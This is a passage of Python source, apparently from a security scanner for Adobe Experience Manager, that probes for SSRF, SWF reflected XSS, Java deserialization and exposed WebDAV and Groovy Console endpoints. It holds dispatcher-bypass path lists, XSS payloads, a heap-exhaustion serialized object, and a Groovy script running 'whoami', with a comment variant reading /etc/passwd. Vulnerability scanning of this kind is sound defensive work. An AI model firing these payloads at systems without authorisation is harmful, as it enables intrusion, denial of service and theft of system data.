        '///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a'
    )
    cache_buster = randint(1, 2**12)  # was randint(0, ...); aligned with every sibling check
    REPORTINGSERVICESSERVLET3 = (path.format(cache_buster) for path in REPORTINGSERVICESSERVLET3)
    for path in itertools.chain(REPORTINGSERVICESSERVLET1, REPORTINGSERVICESSERVLET2, REPORTINGSERVICESSERVLET3):
        url = normalize_url(base_url, path)
        encoded_orig_url = (base64.b16encode(url.encode())).decode()
        back_url = 'http://{0}/{1}/reportingservices/{2}/'.format(my_host, token, encoded_orig_url)
        url = url.format(back_url)
        try:
            http_request(url, proxy=proxy, debug=debug)
        except Exception:  # narrowed from bare except; each probe stays best-effort
            if debug:
                error('Exception while performing a check', check='ssrf_reportingservices_servlet', url=url)
    time.sleep(10)  # give the target time to hit our callback listener
    if 'reportingservices' in d:
        u = base64.b16decode(d.get('reportingservices')[0]).decode()
        # Fixed copy-paste error: the description previously named SalesforceSecretServlet.
        f = Finding('ReportingServicesServlet', u,
                    'SSRF via ReportingServicesProxyServlet (CVE-2018-12809) was detected. '
                    'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
        results.append(f)
    return results
@register('sitecatalyst_servlet')
def ssrf_sitecatalyst_servlet(base_url, my_host, debug=False, proxy=None):
    """Probe for SSRF via the SiteCatalyst segments servlet.

    Sends GET requests whose ``datacenter`` parameter points at our callback
    listener; when the target fetches the back-connect URL, the callback
    handler records a hit in the global dict ``d`` under the 'sitecatalyst'
    key, from which the originally probed URL is recovered (base16-decoded).

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list with a single Finding when the SSRF fired, else empty list
    """
    global token, d
    results = []
    # Plain servlet/template paths, including dispatcher-bypass /// variants.
    SITECATALYST1 = (
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy'
    )
    # Variants carrying a random-string cache buster in the suffix selector.
    SITECATALYST2 = (
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
    )
    cache_buster = random_string()
    SITECATALYST2 = (path.format(cache_buster) for path in SITECATALYST2)
    # Selector-style variants with a numeric cache buster.
    SITECATALYST3 = (
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
        '///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
    )
    cache_buster = randint(1, 2**12)
    SITECATALYST3 = (path.format(cache_buster) for path in SITECATALYST3)
    for path in itertools.chain(SITECATALYST1, SITECATALYST2, SITECATALYST3):
        url = normalize_url(base_url, path)
        # Base16-encode the probed URL so the callback can report which path fired.
        encoded_orig_url = (base64.b16encode(url.encode())).decode()
        back_url = 'http://{0}/{1}/sitecatalyst/{2}/'.format(my_host, token, encoded_orig_url)
        url = url.format(back_url)
        try:
            http_request(url, proxy=proxy, debug=debug)
        except:
            if debug:
                error('Exception while performing a check', check='ssrf_sitecatalyst_servlet', url=url)
    # Give the target time to hit our callback listener before checking for hits.
    time.sleep(10)
    if 'sitecatalyst' in d:
        u = base64.b16decode(d.get('sitecatalyst')[0]).decode()
        f = Finding('SiteCatalystServlet', u,
                    'SSRF via SiteCatalystServlet was detected. '
                    'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87')
        results.append(f)
    return results
@register('autoprovisioning_servlet')
def ssrf_autoprovisioning_servlet(base_url, my_host, debug=False, proxy=None):
    """Probe for SSRF via the AutoProvisioningServlet (POST-based check).

    POSTs an analytics provisioning form whose server field points at our
    callback listener; a hit stored under the 'autoprovisioning' key of the
    global dict ``d`` confirms the SSRF.

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list with a single Finding when the SSRF fired, else empty list
    """
    global token, d
    results = []
    servlet_roots = (
        '/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
        '///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
    )
    # Plain suffixes, then string-busted suffixes, then numeric-busted selectors.
    plain_suffixes = (
        '.json', '.4.2.1...json', '.1.json', '.html', '.html/a.1.json', '.html/a.4.2.1...json'
    )
    probe_paths = ['{0}{1}'.format(root, suffix) for root in servlet_roots for suffix in plain_suffixes]
    buster = random_string()
    string_busted_suffixes = (
        '.json;%0a{0}.css', '.json;%0a{0}.png', '.html;%0a{0}.css', '.html;%0a{0}.png', '.json/{0}.css', '.json/{0}.js',
        '.json/{0}.png', '.json/a.gif', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.json/{0}.html'
    )
    probe_paths += ['{0}{1}'.format(root, suffix.format(buster)) for root in servlet_roots for suffix in string_busted_suffixes]
    buster = randint(1, 2**12)
    numeric_busted_suffixes = (
        '.{0}.css', '.{0}.js', '.{0}.ico', '.{0}.png', '.{0}.jpeg', '.{0}.gif'
    )
    probe_paths += ['{0}{1}'.format(root, suffix.format(buster)) for root in servlet_roots for suffix in numeric_busted_suffixes]
    post_body_template = 'servicename=analytics&analytics.server={0}&analytics.company=1&analytics.username=2&analytics.secret=3&analytics.reportsuite=4'
    for probe in probe_paths:
        url = normalize_url(base_url, probe)
        hex_url = (base64.b16encode(url.encode())).decode()
        callback = 'http://{0}/{1}/autoprovisioning/{2}/'.format(my_host, token, hex_url)
        body = post_body_template.format(callback)
        headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
        try:
            http_request(url, 'POST', data=body, additional_headers=headers, proxy=proxy, debug=debug)
        except:
            if debug:
                error('Exception while performing a check', check='ssrf_autoprovisioning_servlet', url=url)
    # Allow the target time to reach our callback listener.
    time.sleep(10)
    if 'autoprovisioning' in d:
        hit = base64.b16decode(d.get('autoprovisioning')[0]).decode()
        results.append(Finding('AutoProvisioningServlet', hit,
                               'SSRF via AutoProvisioningServlet was detected. '
                               'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87'))
    return results
@register('opensocial_proxy')
def ssrf_opensocial_proxy(base_url, my_host, debug=False, proxy=None):
    """Probe for SSRF via the Opensocial (shindig) proxy endpoint.

    Requests /libs/opensocial/proxy with a url= parameter pointing at our
    callback listener; if the target fetches it, the callback handler records
    the hit in the global dict ``d`` under the 'opensocial' key, from which
    the originally probed URL is recovered (base16-decoded).

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list with a single Finding when the SSRF fired, else empty list
    """
    global token, d
    results = []
    # Plain proxy paths (with dispatcher-bypass /// variants).
    OPENSOCIAL1 = itertools.product(
        (
            '/libs/opensocial/proxy{0}?container=default&url={{0}}',
            '///libs///opensocial///proxy{0}?container=default&url={{0}}'
        ),
        (
            '', '.json', '.1.json', '.4.2.1...json', '.html'
        )
    )
    OPENSOCIAL1 = list(pair[0].format(pair[1]) for pair in OPENSOCIAL1)
    # Suffix variants with a random-string cache buster. A duplicated
    # ';%0a{0}.png' entry was removed - it only produced a second identical probe.
    OPENSOCIAL2 = itertools.product(
        (
            '/libs/opensocial/proxy{0}?container=default&url={{0}}',
            '///libs///opensocial///proxy{0}?container=default&url={{0}}'
        ),
        (
            '/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
            ';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', '/{0}.ico', './{0}.html'
        )
    )
    cache_buster = random_string()
    OPENSOCIAL2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL2)
    # Selector-style variants with a numeric cache buster.
    OPENSOCIAL3 = itertools.product(
        (
            '/libs/opensocial/proxy{0}?container=default&url={{0}}',
            '///libs///opensocial///proxy{0}?container=default&url={{0}}'
        ),
        (
            '.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
        )
    )
    cache_buster = randint(1, 2**12)
    OPENSOCIAL3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL3)
    for path in itertools.chain(OPENSOCIAL1, OPENSOCIAL2, OPENSOCIAL3):
        url = normalize_url(base_url, path)
        encoded_orig_url = (base64.b16encode(url.encode())).decode()
        back_url = 'http://{0}/{1}/opensocial/{2}/'.format(my_host, token, encoded_orig_url)
        url = url.format(back_url)
        try:
            http_request(url, proxy=proxy, debug=debug)
        except Exception:  # narrowed from bare except; each probe stays best-effort
            if debug:
                error('Exception while performing a check', check='ssrf_opensocial_proxy', url=url)
    time.sleep(10)  # give the target time to hit our callback listener
    if 'opensocial' in d:
        u = base64.b16decode(d.get('opensocial')[0]).decode()
        f = Finding('Opensocial (shindig) proxy', u,
                    'SSRF via Opensocial (shindig) proxy. '
                    'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=41')
        results.append(f)
    return results
@register('opensocial_makeRequest')
def ssrf_opensocial_makeRequest(base_url, my_host, debug=False, proxy=None):
    """Probe for SSRF via the Opensocial (shindig) makeRequest endpoint.

    POSTs httpMethod=GET to /libs/opensocial/makeRequest with a url= parameter
    pointing at our callback listener; a hit recorded under the
    'opensocialmakerequest' key of the global dict ``d`` confirms the SSRF.

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list with a single Finding when the SSRF fired, else empty list
    """
    global token, d
    results = []
    # Plain makeRequest paths (with dispatcher-bypass /// variants).
    MAKEREQUEST1 = itertools.product(
        (
            '/libs/opensocial/makeRequest{0}?url={{0}}',
            '///libs///opensocial///makeRequest{0}?url={{0}}'
        ),
        (
            '', '.json', '.1.json', '.4.2.1...json', '.html'
        )
    )
    MAKEREQUEST1 = list(pair[0].format(pair[1]) for pair in MAKEREQUEST1)
    # Suffix variants with a random-string cache buster. A duplicated
    # ';%0a{0}.png' entry was removed - it only produced a second identical probe.
    MAKEREQUEST2 = itertools.product(
        (
            '/libs/opensocial/makeRequest{0}?url={{0}}',
            '///libs///opensocial///makeRequest{0}?url={{0}}'
        ),
        (
            '/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
            ';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', '/{0}.ico', './{0}.html'
        )
    )
    cache_buster = random_string()
    MAKEREQUEST2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST2)
    # Selector-style variants with a numeric cache buster.
    MAKEREQUEST3 = itertools.product(
        (
            '/libs/opensocial/makeRequest{0}?url={{0}}',
            '///libs///opensocial///makeRequest{0}?url={{0}}'
        ),
        (
            '.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
        )
    )
    cache_buster = randint(1, 2**12)
    MAKEREQUEST3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST3)
    for path in itertools.chain(MAKEREQUEST1, MAKEREQUEST2, MAKEREQUEST3):
        url = normalize_url(base_url, path)
        encoded_orig_url = (base64.b16encode(url.encode())).decode()
        back_url = 'http://{0}/{1}/opensocialmakerequest/{2}/'.format(my_host, token, encoded_orig_url)
        url = url.format(back_url)
        # Header/body construction cannot raise; keep only the request in the try.
        headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
        data = 'httpMethod=GET'
        try:
            http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
        except Exception:  # narrowed from bare except; each probe stays best-effort
            if debug:
                error('Exception while performing a check', check='ssrf_opensocial_makeRequest', url=url)
    time.sleep(10)  # give the target time to hit our callback listener
    if 'opensocialmakerequest' in d:
        u = base64.b16decode(d.get('opensocialmakerequest')[0]).decode()
        # Typo fix in the finding description: 'Yon' -> 'You'.
        f = Finding('Opensocial (shindig) makeRequest', u,
                    'SSRF via Opensocial (shindig) makeRequest. You can specify parameters httpMethod, postData, headers, contentType for makeRequest.')
        results.append(f)
    return results
@register('swf_xss')
def swf_xss(base_url, my_host, debug=False, proxy=None):
    """Detect reflected-XSS-prone SWF files shipped with AEM.

    Requests a list of known-vulnerable SWF paths (each with an XSS payload in
    its query string) and reports a finding when the server returns the raw
    flash content inline (200, flash content type, no Content-Disposition
    header forcing download).

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener (unused by this check)
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list of Finding objects, one per exposed SWF
    """
    # Known-vulnerable SWFs with ready-made XSS payloads; each path is also
    # tried with the '.res' dispatcher-bypass suffix.
    SWFS = (
        '/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=javascript:confirm(document.domain)',
        '/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf.res?onclick=javascript:confirm(document.domain)',
        '/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
        '/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf.res?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
        '/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String',
        '/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf.res?javascriptCallbackFunction=alert(document.domain)-String',
        '/libs/dam/widgets/resources/swfupload/swfupload_f9.swf?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/dam/widgets/resources/swfupload/swfupload_f9.swf.res?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/cq/ui/resources/swfupload/swfupload.swf.res?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window',
        '/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window',
        '/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
        '/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf.res?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
        '/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window',
        '/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window'
    )
    results = []
    for path in SWFS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            # content_type() presumably strips parameters from the header value
            # (e.g. '; charset=...') - verify against its definition.
            ct = content_type(resp.headers.get('Content-Type', ''))
            cd = resp.headers.get('Content-Disposition', '')
            # Vulnerable only if served inline as flash (no forced download).
            if resp.status_code == 200 and ct == 'application/x-shockwave-flash' and not cd:
                f = Finding('Reflected XSS via SWF', url,
                            'AEM exposes SWF that might be vulnerable to reflected XSS. '
                            'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=61')
                results.append(f)
        except:
            if debug:
                error('Exception while performing a check', check='swf_xss', url=url)
    return results
@register('externaljob_servlet')
def deser_externaljob_servlet(base_url, my_host, debug=False, proxy=None):
    """Check whether ExternalJobServlet deserializes untrusted Java objects.

    Uploads a serialized java.lang.Object[] bomb as the 'jobevent' file part;
    a 500 response complaining about 'Java heap space' shows the payload was
    actually deserialized by the servlet.

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener (unused by this check)
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request_multipart
    :return: list with a single Finding when vulnerable, else empty list
    """
    buster = random_string(3)
    # Generated with oisdos - java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap
    payload = base64.b64decode('rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=')
    servlet_roots = ('/libs/dam/cloud/proxy', '///libs///dam///cloud///proxy')
    suffixes = ('.json', '.css', '.js', '.html', '.ico', '.png', '.gif', '.1.json',
                '...4.2.1...json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico')
    probes = ['{0}{1}'.format(root, suffix.format(buster)) for root in servlet_roots for suffix in suffixes]
    results = []
    for probe in probes:
        url = normalize_url(base_url, probe)
        form = {':operation': ('', 'job'), 'file': ('jobevent', payload, 'application/octet-stream')}
        headers = {'Referer': base_url}
        try:
            resp = http_request_multipart(url, data=form, additional_headers=headers, proxy=proxy, debug=debug)
            if resp.status_code == 500 and 'Java heap space' in str(resp.content):
                results.append(Finding('ExternalJobServlet', url,
                                       'ExternalJobServlet is vulnerable to Java untrusted data deserialization. '
                                       'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=102'))
                break
        except:
            if debug:
                error('Exception while performing a check', check='deser_externaljob_servlet', url=url)
    return results
@register('webdav')
def exposed_webdav(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed WebDAV endpoint (candidate for CVE-2015-1833).

    Requests /crx/repository/test variants and reports a finding when the
    server answers 401 with a WWW-Authenticate header mentioning WebDAV.

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener (unused by this check)
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list with a single Finding when WebDAV is exposed, else empty list
    """
    r = random_string(3)
    WEBDAV = itertools.product(('/crx/repository/test', ),
                               ('', '.json', '.css', '.html', '.ico',
                                ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
                                '/{0}.css', '/{0}.html', '/{0}.ico'))
    WEBDAV = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in WEBDAV)
    results = []
    for path in WEBDAV:
        # Build the URL outside the try block: previously a failure inside
        # normalize_url would raise NameError on 'url' in the except handler.
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            www_authenticate = resp.headers.get('WWW-Authenticate', '').lower()
            if resp.status_code == 401 and 'webdav' in www_authenticate:
                # Typo fix in the finding description: 'might we' -> 'might be'.
                f = Finding('WebDAV exposed', url,
                            'WebDAV might be vulnerable to CVE-2015-1833. Check it manually. '
                            'See - http://mail-archives.apache.org/mod_mbox/jackrabbit-announce/201505.mbox/raw/%3C555DA644.8080908@greenbytes.de%3E/3')
                results.append(f)
                break
        except Exception:  # narrowed from bare except; each probe stays best-effort
            if debug:
                error('Exception while performing a check', check='exposed_webdav', url=url)
    return results
@register('groovy_console')
def exposed_groovy_console(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed AEM Groovy Console (script execution implies RCE).

    First POSTs a Groovy script that runs 'whoami' to the console's script
    endpoints; then GETs the audit endpoint for evidence of prior executions.

    :param base_url: base URL of the AEM instance under test
    :param my_host: host:port of our callback listener (unused by this check)
    :param debug: when True, log exceptions raised by individual requests
    :param proxy: optional proxy passed through to http_request
    :return: list of Finding objects (empty if the console is not exposed)
    """
    r = random_string(3)
    # URL-encoded Groovy that executes 'whoami' and prints its output.
    SCRIPT = 'def%20command%20%3D%20%22whoami%22%0D%0Adef%20proc%20%3D%20command.execute%28%29%0D%0Aproc.waitFor%28%29%0D%0Aprintln%20%22%24%7Bproc.in.text%7D%22' # 'def+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.text'
    # Script-execution endpoints (servlet and jcr:content variants), each with
    # cache-busted dispatcher-bypass suffixes.
    GROOVYSCRIPT1 = itertools.product(('/bin/groovyconsole/post.servlet', '///bin///groovyconsole///post.servlet'),
                                      ('', '.css', '.html', '.ico', '.json', '.1.json', '...4.2.1...json', ';%0a{0}.css',
                                       ';%0a{0}.html', ';%0a{0}.ico'))
    GROOVYSCRIPT1 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT1)
    GROOVYSCRIPT2 = itertools.product(('/etc/groovyconsole/jcr:content.html', '///etc///groovyconsole///jcr:content.html'),
                                      ('', '/{0}.css', '/{0}.html', '/{0}.ico', '/{0}.1.json', '/{0}...4.2.1...json',
                                       ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
    GROOVYSCRIPT2 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT2)
    # Audit endpoint that lists previous console executions.
